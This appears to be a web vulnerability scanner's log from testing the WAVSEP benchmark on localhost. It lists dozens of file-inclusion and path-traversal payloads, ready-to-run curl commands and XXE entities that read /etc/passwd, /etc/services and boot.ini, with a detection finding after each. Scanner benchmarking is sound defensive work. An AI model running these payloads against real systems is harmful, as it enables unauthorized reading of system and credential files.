GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
